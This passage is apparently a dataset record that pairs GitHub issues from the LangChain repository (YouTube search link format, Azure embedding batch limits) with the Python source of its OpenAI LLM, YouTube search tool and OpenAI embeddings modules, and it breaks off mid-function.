values["openai_api_base"] = get_from_dict_or_env(
values,
"openai_api_base",
"OPENAI_API_BASE",
default="",
)
values["openai_proxy"] = get_from_dict_or_env(
values,
"openai_proxy",
"OPENAI_PROXY",
default="",
)
values["openai_organization"] = get_from_dict_or_env(
values,
"openai_organization",
"OPENAI_ORGANIZATION",
default="",
)
try:
import openai
values["client"] = openai.Completion
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
if values["streaming"] and values["n"] > 1:
raise ValueError("Cannot stream results when n > 1.")
if values["streaming"] and values["best_of"] > 1:
raise ValueError("Cannot stream results when best_of > 1.")
return values
@property
def _default_params(self) -> Dict[str, Any]:
"""Get the default parameters for calling OpenAI API."""
normal_params = {
"temperature": self.temperature,
"max_tokens": self.max_tokens,
"top_p": self.top_p,
"frequency_penalty": self.frequency_penalty,
"presence_penalty": self.presence_penalty,
"n": self.n,
"request_timeout": self.request_timeout,
"logit_bias": self.logit_bias,
}
# Azure gpt-35-turbo doesn't support best_of
# don't specify best_of if it is 1
if self.best_of > 1:
normal_params["best_of"] = self.best_of
return {**normal_params, **self.model_kwargs}
def _stream(
self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> Iterator[GenerationChunk]:
params = {**self._invocation_params, **kwargs, "stream": True}
self.get_sub_prompts(params, [prompt], stop) # this mutates params
for stream_resp in completion_with_retry(
self, prompt=prompt, run_manager=run_manager, **params
):
chunk = _stream_response_to_generation_chunk(stream_resp)
yield chunk
if run_manager:
run_manager.on_llm_new_token(
chunk.text,
chunk=chunk,
verbose=self.verbose,
logprobs=chunk.generation_info["logprobs"]
if chunk.generation_info
else None,
)
async def _astream(
self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> AsyncIterator[GenerationChunk]:
params = {**self._invocation_params, **kwargs, "stream": True}
self.get_sub_prompts(params, [prompt], stop) # this mutate params
async for stream_resp in await acompletion_with_retry(
self, prompt=prompt, run_manager=run_manager, **params
):
chunk = _stream_response_to_generation_chunk(stream_resp)
yield chunk
if run_manager:
await run_manager.on_llm_new_token(
chunk.text,
chunk=chunk,
verbose=self.verbose,
logprobs=chunk.generation_info["logprobs"]
if chunk.generation_info
else None,
)
def _generate(
self,
prompts: List[str],
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> LLMResult:
"""Call out to OpenAI's endpoint with k unique prompts.
Args:
prompts: The prompts to pass into the model.
stop: Optional list of stop words to use when generating.
Returns:
The full LLM output.
Example:
.. code-block:: python
response = openai.generate(["Tell me a joke."])
"""
# TODO: write a unit test for this
params = self._invocation_params
params = {**params, **kwargs}
sub_prompts = self.get_sub_prompts(params, prompts, stop)
choices = []
token_usage: Dict[str, int] = {}
# Get the token usage from the response.
# Includes prompt, completion, and total tokens used.
_keys = {"completion_tokens", "prompt_tokens", "total_tokens"}
for _prompts in sub_prompts:
if self.streaming:
if len(_prompts) > 1:
raise ValueError("Cannot stream results with multiple prompts.")
generation: Optional[GenerationChunk] = None
for chunk in self._stream(_prompts[0], stop, run_manager, **kwargs):
if generation is None:
generation = chunk
else:
generation += chunk
assert generation is not None
choices.append(
{
"text": generation.text,
"finish_reason": generation.generation_info.get("finish_reason")
if generation.generation_info
else None,
"logprobs": generation.generation_info.get("logprobs")
if generation.generation_info
else None,
}
)
else:
response = completion_with_retry(
self, prompt=_prompts, run_manager=run_manager, **params
)
choices.extend(response["choices"])
update_token_usage(_keys, response, token_usage)
return self.create_llm_result(choices, prompts, token_usage)
async def _agenerate(
self,
prompts: List[str],
stop: Optional[List[str]] = None,
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> LLMResult:
"""Call out to OpenAI's endpoint async with k unique prompts."""
params = self._invocation_params
params = {**params, **kwargs}
sub_prompts = self.get_sub_prompts(params, prompts, stop)
choices = []
token_usage: Dict[str, int] = {}
# Get the token usage from the response.
# Includes prompt, completion, and total tokens used.
_keys = {"completion_tokens", "prompt_tokens", "total_tokens"}
for _prompts in sub_prompts:
if self.streaming:
if len(_prompts) > 1:
raise ValueError("Cannot stream results with multiple prompts.")
generation: Optional[GenerationChunk] = None
async for chunk in self._astream(
_prompts[0], stop, run_manager, **kwargs
):
if generation is None:
generation = chunk
else:
generation += chunk
assert generation is not None
choices.append(
{
"text": generation.text,
"finish_reason": generation.generation_info.get("finish_reason")
if generation.generation_info
else None,
"logprobs": generation.generation_info.get("logprobs")
if generation.generation_info
else None,
}
)
else:
response = await acompletion_with_retry(
self, prompt=_prompts, run_manager=run_manager, **params
)
choices.extend(response["choices"])
update_token_usage(_keys, response, token_usage)
return self.create_llm_result(choices, prompts, token_usage)
def get_sub_prompts(
self,
params: Dict[str, Any],
prompts: List[str],
stop: Optional[List[str]] = None,
) -> List[List[str]]:
"""Get the sub prompts for llm call."""
if stop is not None:
if "stop" in params:
raise ValueError("`stop` found in both the input and default params.")
params["stop"] = stop
if params["max_tokens"] == -1:
if len(prompts) != 1:
raise ValueError(
"max_tokens set to -1 not supported for multiple inputs."
)
params["max_tokens"] = self.max_tokens_for_prompt(prompts[0])
sub_prompts = [
prompts[i : i + self.batch_size]
for i in range(0, len(prompts), self.batch_size)
]
return sub_prompts
def create_llm_result(
self, choices: Any, prompts: List[str], token_usage: Dict[str, int]
) -> LLMResult:
"""Create the LLMResult from the choices and prompts."""
generations = []
for i, _ in enumerate(prompts):
sub_choices = choices[i * self.n : (i + 1) * self.n]
generations.append(
[
Generation(
text=choice["text"],
generation_info=dict(
finish_reason=choice.get("finish_reason"),
logprobs=choice.get("logprobs"),
),
)
for choice in sub_choices
]
)
llm_output = {"token_usage": token_usage, "model_name": self.model_name}
return LLMResult(generations=generations, llm_output=llm_output)
@property
def _invocation_params(self) -> Dict[str, Any]:
"""Get the parameters used to invoke the model."""
openai_creds: Dict[str, Any] = {
"api_key": self.openai_api_key,
"api_base": self.openai_api_base,
"organization": self.openai_organization,
}
if self.openai_proxy:
import openai
openai.proxy = {"http": self.openai_proxy, "https": self.openai_proxy} # type: ignore[assignment] # noqa: E501
return {**openai_creds, **self._default_params}
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
return {**{"model_name": self.model_name}, **self._default_params}
@property
def _llm_type(self) -> str:
"""Return type of llm."""
return "openai"
def get_token_ids(self, text: str) -> List[int]:
"""Get the token IDs using the tiktoken package."""
# tiktoken NOT supported for Python < 3.8
if sys.version_info[1] < 8:
return super().get_num_tokens(text)
try:
import tiktoken
except ImportError:
raise ImportError(
"Could not import tiktoken python package. "
"This is needed in order to calculate get_num_tokens. "
"Please install it with `pip install tiktoken`."
)
model_name = self.tiktoken_model_name or self.model_name
try:
enc = tiktoken.encoding_for_model(model_name)
except KeyError:
logger.warning("Warning: model not found. Using cl100k_base encoding.")
model = "cl100k_base"
enc = tiktoken.get_encoding(model)
return enc.encode(
text,
allowed_special=self.allowed_special,
disallowed_special=self.disallowed_special,
)
@staticmethod
def modelname_to_contextsize(modelname: str) -> int:
"""Calculate the maximum number of tokens possible to generate for a model.
Args:
modelname: The modelname we want to know the context size for.
Returns:
The maximum context size
Example:
.. code-block:: python
max_tokens = openai.modelname_to_contextsize("text-davinci-003")
"""
model_token_mapping = {
"gpt-4": 8192,
"gpt-4-0314": 8192,
"gpt-4-0613": 8192,
"gpt-4-32k": 32768,
"gpt-4-32k-0314": 32768,
"gpt-4-32k-0613": 32768,
"gpt-3.5-turbo": 4096,
"gpt-3.5-turbo-0301": 4096,
"gpt-3.5-turbo-0613": 4096,
"gpt-3.5-turbo-16k": 16385,
"gpt-3.5-turbo-16k-0613": 16385,
"text-ada-001": 2049,
"ada": 2049,
"text-babbage-001": 2040,
"babbage": 2049,
"text-curie-001": 2049,
"curie": 2049,
"davinci": 2049,
"text-davinci-003": 4097,
"text-davinci-002": 4097,
"code-davinci-002": 8001,
"code-davinci-001": 8001,
"code-cushman-002": 2048,
"code-cushman-001": 2048,
}
# handling finetuned models
if "ft-" in modelname:
modelname = modelname.split(":")[0]
context_size = model_token_mapping.get(modelname, None)
if context_size is None:
raise ValueError(
f"Unknown model: {modelname}. Please provide a valid OpenAI model name."
"Known models are: " + ", ".join(model_token_mapping.keys())
)
return context_size
@property
def max_context_size(self) -> int:
"""Get max context size for this model."""
return self.modelname_to_contextsize(self.model_name)
def max_tokens_for_prompt(self, prompt: str) -> int:
"""Calculate the maximum number of tokens possible to generate for a prompt.
Args:
prompt: The prompt to pass into the model.
Returns:
The maximum number of tokens to generate for a prompt.
Example:
.. code-block:: python
max_tokens = openai.max_token_for_prompt("Tell me a joke.")
"""
num_tokens = self.get_num_tokens(prompt)
return self.max_context_size - num_tokens
class OpenAI(BaseOpenAI):
"""OpenAI large language models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set with your API key.
Any parameters that are valid to be passed to the openai.create call can be passed
in, even if not explicitly saved on this class.
Example:
.. code-block:: python
from langchain.llms import OpenAI
openai = OpenAI(model_name="text-davinci-003")
"""
@property
def _invocation_params(self) -> Dict[str, Any]:
return {**{"model": self.model_name}, **super()._invocation_params}
class AzureOpenAI(BaseOpenAI):
"""Azure-specific OpenAI large language models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set with your API key.
Any parameters that are valid to be passed to the openai.create call can be passed
in, even if not explicitly saved on this class.
Example:
.. code-block:: python
from langchain.llms import AzureOpenAI
openai = AzureOpenAI(model_name="text-davinci-003")
"""
deployment_name: str = ""
"""Deployment name to use."""
openai_api_type: str = ""
openai_api_version: str = ""
@root_validator()
def validate_azure_settings(cls, values: Dict) -> Dict:
values["openai_api_version"] = get_from_dict_or_env(
values,
"openai_api_version",
"OPENAI_API_VERSION",
)
values["openai_api_type"] = get_from_dict_or_env(
values, "openai_api_type", "OPENAI_API_TYPE", "azure"
)
return values
@property
def _identifying_params(self) -> Mapping[str, Any]:
return {
**{"deployment_name": self.deployment_name},
**super()._identifying_params,
}
@property
def _invocation_params(self) -> Dict[str, Any]:
openai_params = {
"engine": self.deployment_name,
"api_type": self.openai_api_type,
"api_version": self.openai_api_version,
}
return {**openai_params, **super()._invocation_params}
@property
def _llm_type(self) -> str:
"""Return type of llm."""
return "azure"
class OpenAIChat(BaseLLM):
"""OpenAI Chat large language models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set with your API key.
Any parameters that are valid to be passed to the openai.create call can be passed
in, even if not explicitly saved on this class.
Example:
.. code-block:: python
from langchain.llms import OpenAIChat
openaichat = OpenAIChat(model_name="gpt-3.5-turbo")
"""
client: Any #: :meta private:
model_name: str = "gpt-3.5-turbo"
"""Model name to use."""
model_kwargs: Dict[str, Any] = Field(default_factory=dict)
"""Holds any model parameters valid for `create` call not explicitly specified."""
openai_api_key: Optional[str] = None
openai_api_base: Optional[str] = None
# to support explicit proxy for OpenAI
openai_proxy: Optional[str] = None
max_retries: int = 6
"""Maximum number of retries to make when generating."""
prefix_messages: List = Field(default_factory=list)
"""Series of messages for Chat input."""
streaming: bool = False
"""Whether to stream the results or not."""
allowed_special: Union[Literal["all"], AbstractSet[str]] = set()
"""Set of special tokens that are allowed。"""
disallowed_special: Union[Literal["all"], Collection[str]] = "all"
"""Set of special tokens that are not allowed。"""
@root_validator(pre=True)
def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
"""Build extra kwargs from additional params that were passed in."""
all_required_field_names = {field.alias for field in cls.__fields__.values()}
extra = values.get("model_kwargs", {})
for field_name in list(values):
if field_name not in all_required_field_names:
if field_name in extra:
raise ValueError(f"Found {field_name} supplied twice.")
extra[field_name] = values.pop(field_name)
values["model_kwargs"] = extra
return values
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and python package exists in environment."""
openai_api_key = get_from_dict_or_env(
values, "openai_api_key", "OPENAI_API_KEY"
)
openai_api_base = get_from_dict_or_env(
values,
"openai_api_base",
"OPENAI_API_BASE",
default="",
)
openai_proxy = get_from_dict_or_env(
values,
"openai_proxy",
"OPENAI_PROXY",
default="",
)
openai_organization = get_from_dict_or_env(
values, "openai_organization", "OPENAI_ORGANIZATION", default=""
)
try:
import openai
openai.api_key = openai_api_key
if openai_api_base:
openai.api_base = openai_api_base
if openai_organization:
openai.organization = openai_organization
if openai_proxy:
openai.proxy = {"http": openai_proxy, "https": openai_proxy} # type: ignore[assignment] # noqa: E501
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
try:
values["client"] = openai.ChatCompletion
except AttributeError:
raise ValueError(
"`openai` has no `ChatCompletion` attribute, this is likely "
"due to an old version of the openai package. Try upgrading it "
"with `pip install --upgrade openai`."
)
warnings.warn(
"You are trying to use a chat model. This way of initializing it is "
"no longer supported. Instead, please use: "
"`from langchain.chat_models import ChatOpenAI`"
)
return values
@property
def _default_params(self) -> Dict[str, Any]:
"""Get the default parameters for calling OpenAI API."""
return self.model_kwargs
def _get_chat_params(
self, prompts: List[str], stop: Optional[List[str]] = None
) -> Tuple:
if len(prompts) > 1:
raise ValueError(
f"OpenAIChat currently only supports single prompt, got {prompts}"
)
messages = self.prefix_messages + [{"role": "user", "content": prompts[0]}]
params: Dict[str, Any] = {**{"model": self.model_name}, **self._default_params}
if stop is not None:
if "stop" in params:
raise ValueError("`stop` found in both the input and default params.")
params["stop"] = stop
if params.get("max_tokens") == -1:
# for ChatGPT api, omitting max_tokens is equivalent to having no limit
del params["max_tokens"]
return messages, params
def _stream(
self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> Iterator[GenerationChunk]:
messages, params = self._get_chat_params([prompt], stop)
params = {**params, **kwargs, "stream": True}
for stream_resp in completion_with_retry(
self, messages=messages, run_manager=run_manager, **params
):
token = stream_resp["choices"][0]["delta"].get("content", "")
chunk = GenerationChunk(text=token)
yield chunk
if run_manager:
run_manager.on_llm_new_token(token, chunk=chunk)
async def _astream(
self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> AsyncIterator[GenerationChunk]:
messages, params = self._get_chat_params([prompt], stop)
params = {**params, **kwargs, "stream": True}
async for stream_resp in await acompletion_with_retry(
self, messages=messages, run_manager=run_manager, **params
):
token = stream_resp["choices"][0]["delta"].get("content", "")
chunk = GenerationChunk(text=token)
yield chunk
if run_manager:
await run_manager.on_llm_new_token(token, chunk=chunk)
def _generate(
self,
prompts: List[str],
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> LLMResult:
if self.streaming:
generation: Optional[GenerationChunk] = None
for chunk in self._stream(prompts[0], stop, run_manager, **kwargs):
if generation is None:
generation = chunk
else:
generation += chunk
assert generation is not None
return LLMResult(generations=[[generation]])
messages, params = self._get_chat_params(prompts, stop)
params = {**params, **kwargs}
full_response = completion_with_retry(
self, messages=messages, run_manager=run_manager, **params
)
llm_output = {
"token_usage": full_response["usage"],
"model_name": self.model_name,
}
return LLMResult(
generations=[
[Generation(text=full_response["choices"][0]["message"]["content"])]
],
llm_output=llm_output,
)
async def _agenerate(
self,
prompts: List[str],
stop: Optional[List[str]] = None,
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> LLMResult:
if self.streaming:
generation: Optional[GenerationChunk] = None
async for chunk in self._astream(prompts[0], stop, run_manager, **kwargs):
if generation is None:
generation = chunk
else:
generation += chunk
assert generation is not None
return LLMResult(generations=[[generation]])
messages, params = self._get_chat_params(prompts, stop)
params = {**params, **kwargs}
full_response = await acompletion_with_retry(
self, messages=messages, run_manager=run_manager, **params
)
llm_output = {
"token_usage": full_response["usage"],
"model_name": self.model_name,
}
return LLMResult(
generations=[
[Generation(text=full_response["choices"][0]["message"]["content"])]
],
llm_output=llm_output,
)
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
return {**{"model_name": self.model_name}, **self._default_params}
@property
def _llm_type(self) -> str:
"""Return type of llm."""
return "openai-chat"
def get_token_ids(self, text: str) -> List[int]:
"""Get the token IDs using the tiktoken package."""
# tiktoken NOT supported for Python < 3.8
if sys.version_info[1] < 8:
return super().get_token_ids(text)
try:
import tiktoken
except ImportError:
raise ImportError(
"Could not import tiktoken python package. "
"This is needed in order to calculate get_num_tokens. "
"Please install it with `pip install tiktoken`."
)
enc = tiktoken.encoding_for_model(self.model_name)
return enc.encode(
text,
allowed_special=self.allowed_special,
disallowed_special=self.disallowed_special,
)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,742 | Update return parameter of YouTubeSearchTool | ### Feature request
Return the Youtube video links in full format like `https://www.youtube.com/watch?v=VIDEO_ID`
Currently the links are like `/watch?v=VIDEO_ID`
Return the links as List like `['link1, 'link2']`
Currently it is returning the whole list as string ` "['link1, 'link2']" `
### Motivation
If the links returned are exact same as **direct links to youtube in a list** rather than a string, i can avoid the hustle and bustle of processing it agian to convert to the required format
### Your contribution
I will change the code a bit and pull it. | https://github.com/langchain-ai/langchain/issues/10742 | https://github.com/langchain-ai/langchain/pull/10743 | 1dae3c383ed17b0a2e4675accf396bc73834de75 | 740eafe41da7317f42387bdfe6d0f1f521f2cafd | "2023-09-18T17:47:53Z" | python | "2023-09-20T00:04:06Z" | libs/langchain/langchain/tools/youtube/search.py | """
Adapted from https://github.com/venuv/langchain_yt_tools
CustomYTSearchTool searches YouTube videos related to a person
and returns a specified number of video URLs.
Input to this tool should be a comma separated list,
- the first part contains a person name
- and the second(optional) a number that is the
maximum number of video results to return
"""
import json
from typing import Optional
from langchain.callbacks.manager import CallbackManagerForToolRun
from langchain.tools import BaseTool
class YouTubeSearchTool(BaseTool):
"""Tool that queries YouTube."""
name: str = "youtube_search"
description: str = (
"search for youtube videos associated with a person. "
"the input to this tool should be a comma separated list, "
"the first part contains a person name and the second a "
"number that is the maximum number of video results "
"to return aka num_results. the second part is optional"
)
def _search(self, person: str, num_results: int) -> str:
from youtube_search import YoutubeSearch
results = YoutubeSearch(person, num_results).to_json()
data = json.loads(results)
url_suffix_list = [video["url_suffix"] for video in data["videos"]]
return str(url_suffix_list)
def _run(
self,
query: str,
run_manager: Optional[CallbackManagerForToolRun] = None,
) -> str:
"""Use the tool."""
values = query.split(",")
person = values[0]
if len(values) > 1:
num_results = int(values[1])
else:
num_results = 2
return self._search(person, num_results)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | from __future__ import annotations
import logging
import warnings
from typing import (
Any,
Callable,
Dict,
List,
Literal,
Optional,
Sequence,
Set,
Tuple,
Union,
)
import numpy as np
from tenacity import (
AsyncRetrying,
before_sleep_log,
retry,
retry_if_exception_type,
stop_after_attempt,
wait_exponential,
)
from langchain.pydantic_v1 import BaseModel, Extra, Field, root_validator
from langchain.schema.embeddings import Embeddings
from langchain.utils import get_from_dict_or_env, get_pydantic_field_names
logger = logging.getLogger(__name__)
def _create_retry_decorator(embeddings: OpenAIEmbeddings) -> Callable[[Any], Any]:
import openai
min_seconds = 4
max_seconds = 10
# Wait 2^x * 1 second between each retry starting with
# 4 seconds, then up to 10 seconds, then 10 seconds afterwards
return retry(
reraise=True,
stop=stop_after_attempt(embeddings.max_retries),
wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
retry=(
retry_if_exception_type(openai.error.Timeout)
| retry_if_exception_type(openai.error.APIError)
| retry_if_exception_type(openai.error.APIConnectionError)
| retry_if_exception_type(openai.error.RateLimitError)
| retry_if_exception_type(openai.error.ServiceUnavailableError)
),
before_sleep=before_sleep_log(logger, logging.WARNING),
)
def _async_retry_decorator(embeddings: OpenAIEmbeddings) -> Any:
import openai
min_seconds = 4
max_seconds = 10
# Wait 2^x * 1 second between each retry starting with
# 4 seconds, then up to 10 seconds, then 10 seconds afterwards
async_retrying = AsyncRetrying(
reraise=True,
stop=stop_after_attempt(embeddings.max_retries),
wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
retry=(
retry_if_exception_type(openai.error.Timeout)
| retry_if_exception_type(openai.error.APIError)
| retry_if_exception_type(openai.error.APIConnectionError)
| retry_if_exception_type(openai.error.RateLimitError)
| retry_if_exception_type(openai.error.ServiceUnavailableError)
),
before_sleep=before_sleep_log(logger, logging.WARNING),
)
def wrap(func: Callable) -> Callable:
async def wrapped_f(*args: Any, **kwargs: Any) -> Callable:
async for _ in async_retrying:
return await func(*args, **kwargs)
raise AssertionError("this is unreachable")
return wrapped_f
return wrap
# https://stackoverflow.com/questions/76469415/getting-embeddings-of-length-1-from-langchain-openaiembeddings
def _check_response(response: dict, skip_empty: bool = False) -> dict:
if any(len(d["embedding"]) == 1 for d in response["data"]) and not skip_empty:
import openai
raise openai.error.APIError("OpenAI API returned an empty embedding")
return response
def embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any:
"""Use tenacity to retry the embedding call."""
retry_decorator = _create_retry_decorator(embeddings)
@retry_decorator
def _embed_with_retry(**kwargs: Any) -> Any:
response = embeddings.client.create(**kwargs)
return _check_response(response, skip_empty=embeddings.skip_empty)
return _embed_with_retry(**kwargs)
async def async_embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any:
"""Use tenacity to retry the embedding call."""
@_async_retry_decorator(embeddings)
async def _async_embed_with_retry(**kwargs: Any) -> Any:
response = await embeddings.client.acreate(**kwargs)
return _check_response(response, skip_empty=embeddings.skip_empty)
return await _async_embed_with_retry(**kwargs)
class OpenAIEmbeddings(BaseModel, Embeddings):
"""OpenAI embedding models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set with your API key or pass it
as a named parameter to the constructor.
Example:
.. code-block:: python
from langchain.embeddings import OpenAIEmbeddings
openai = OpenAIEmbeddings(openai_api_key="my-api-key")
In order to use the library with Microsoft Azure endpoints, you need to set
the OPENAI_API_TYPE, OPENAI_API_BASE, OPENAI_API_KEY and OPENAI_API_VERSION.
The OPENAI_API_TYPE must be set to 'azure' and the others correspond to
the properties of your endpoint.
In addition, the deployment name must be passed as the model parameter.
Example:
.. code-block:: python
import os
os.environ["OPENAI_API_TYPE"] = "azure"
os.environ["OPENAI_API_BASE"] = "https://<your-endpoint.openai.azure.com/"
os.environ["OPENAI_API_KEY"] = "your AzureOpenAI key"
os.environ["OPENAI_API_VERSION"] = "2023-05-15"
os.environ["OPENAI_PROXY"] = "http://your-corporate-proxy:8080"
from langchain.embeddings.openai import OpenAIEmbeddings
embeddings = OpenAIEmbeddings(
deployment="your-embeddings-deployment-name",
model="your-embeddings-model-name",
openai_api_base="https://your-endpoint.openai.azure.com/",
openai_api_type="azure",
)
text = "This is a test query."
query_result = embeddings.embed_query(text)
"""
client: Any = None #: :meta private:
model: str = "text-embedding-ada-002"
deployment: str = model # to support Azure OpenAI Service custom deployment names
openai_api_version: Optional[str] = None
# to support Azure OpenAI Service custom endpoints
openai_api_base: Optional[str] = None
# to support Azure OpenAI Service custom endpoints
openai_api_type: Optional[str] = None
# to support explicit proxy for OpenAI
openai_proxy: Optional[str] = None
embedding_ctx_length: int = 8191
"""The maximum number of tokens to embed at once."""
openai_api_key: Optional[str] = None
openai_organization: Optional[str] = None
allowed_special: Union[Literal["all"], Set[str]] = set()
disallowed_special: Union[Literal["all"], Set[str], Sequence[str]] = "all"
chunk_size: int = 1000
"""Maximum number of texts to embed in each batch"""
max_retries: int = 6
"""Maximum number of retries to make when generating."""
request_timeout: Optional[Union[float, Tuple[float, float]]] = None
"""Timeout in seconds for the OpenAPI request."""
headers: Any = None
tiktoken_model_name: Optional[str] = None
"""The model name to pass to tiktoken when using this class.
Tiktoken is used to count the number of tokens in documents to constrain
them to be under a certain limit. By default, when set to None, this will
be the same as the embedding model name. However, there are some cases
where you may want to use this Embedding class with a model name not
supported by tiktoken. This can include when using Azure embeddings or
when using one of the many model providers that expose an OpenAI-like
API but with different models. In those cases, in order to avoid erroring
when tiktoken is called, you can specify a model name to use here."""
show_progress_bar: bool = False
"""Whether to show a progress bar when embedding."""
model_kwargs: Dict[str, Any] = Field(default_factory=dict)
"""Holds any model parameters valid for `create` call not explicitly specified."""
skip_empty: bool = False
"""Whether to skip empty strings when embedding or raise an error.
Defaults to not skipping."""
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
@root_validator(pre=True)
def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
"""Build extra kwargs from additional params that were passed in."""
all_required_field_names = get_pydantic_field_names(cls)
extra = values.get("model_kwargs", {})
for field_name in list(values):
if field_name in extra:
raise ValueError(f"Found {field_name} supplied twice.")
if field_name not in all_required_field_names:
warnings.warn(
f"""WARNING! {field_name} is not default parameter.
{field_name} was transferred to model_kwargs.
Please confirm that {field_name} is what you intended."""
)
extra[field_name] = values.pop(field_name)
invalid_model_kwargs = all_required_field_names.intersection(extra.keys())
if invalid_model_kwargs:
raise ValueError(
f"Parameters {invalid_model_kwargs} should be specified explicitly. "
f"Instead they were passed in as part of `model_kwargs` parameter."
)
values["model_kwargs"] = extra
return values
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and python package exists in environment."""
values["openai_api_key"] = get_from_dict_or_env(
values, "openai_api_key", "OPENAI_API_KEY"
)
values["openai_api_base"] = get_from_dict_or_env(
values,
"openai_api_base",
"OPENAI_API_BASE",
default="",
)
values["openai_api_type"] = get_from_dict_or_env(
values,
"openai_api_type",
"OPENAI_API_TYPE",
default="",
)
values["openai_proxy"] = get_from_dict_or_env(
values,
"openai_proxy",
"OPENAI_PROXY",
default="",
)
if values["openai_api_type"] in ("azure", "azure_ad", "azuread"):
default_api_version = "2022-12-01"
else:
default_api_version = ""
values["openai_api_version"] = get_from_dict_or_env(
values,
"openai_api_version",
"OPENAI_API_VERSION",
default=default_api_version,
)
values["openai_organization"] = get_from_dict_or_env(
values,
"openai_organization",
"OPENAI_ORGANIZATION",
default="",
)
try:
import openai
values["client"] = openai.Embedding
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
return values
@property
def _invocation_params(self) -> Dict:
openai_args = {
"model": self.model,
"request_timeout": self.request_timeout,
"headers": self.headers,
"api_key": self.openai_api_key,
"organization": self.openai_organization,
"api_base": self.openai_api_base,
"api_type": self.openai_api_type,
"api_version": self.openai_api_version,
**self.model_kwargs,
}
if self.openai_api_type in ("azure", "azure_ad", "azuread"):
openai_args["engine"] = self.deployment
if self.openai_proxy:
try:
import openai
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
openai.proxy = {
"http": self.openai_proxy,
"https": self.openai_proxy,
} # type: ignore[assignment] # noqa: E501
return openai_args
# please refer to
# https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb
def _get_len_safe_embeddings(
self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None
) -> List[List[float]]:
embeddings: List[List[float]] = [[] for _ in range(len(texts))]
try:
import tiktoken
except ImportError:
raise ImportError(
"Could not import tiktoken python package. "
"This is needed in order to for OpenAIEmbeddings. "
"Please install it with `pip install tiktoken`."
)
tokens = []
indices = []
model_name = self.tiktoken_model_name or self.model
try:
encoding = tiktoken.encoding_for_model(model_name)
except KeyError:
logger.warning("Warning: model not found. Using cl100k_base encoding.")
model = "cl100k_base"
encoding = tiktoken.get_encoding(model)
for i, text in enumerate(texts):
if self.model.endswith("001"):
# See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500
# replace newlines, which can negatively affect performance.
text = text.replace("\n", " ")
token = encoding.encode(
text,
allowed_special=self.allowed_special,
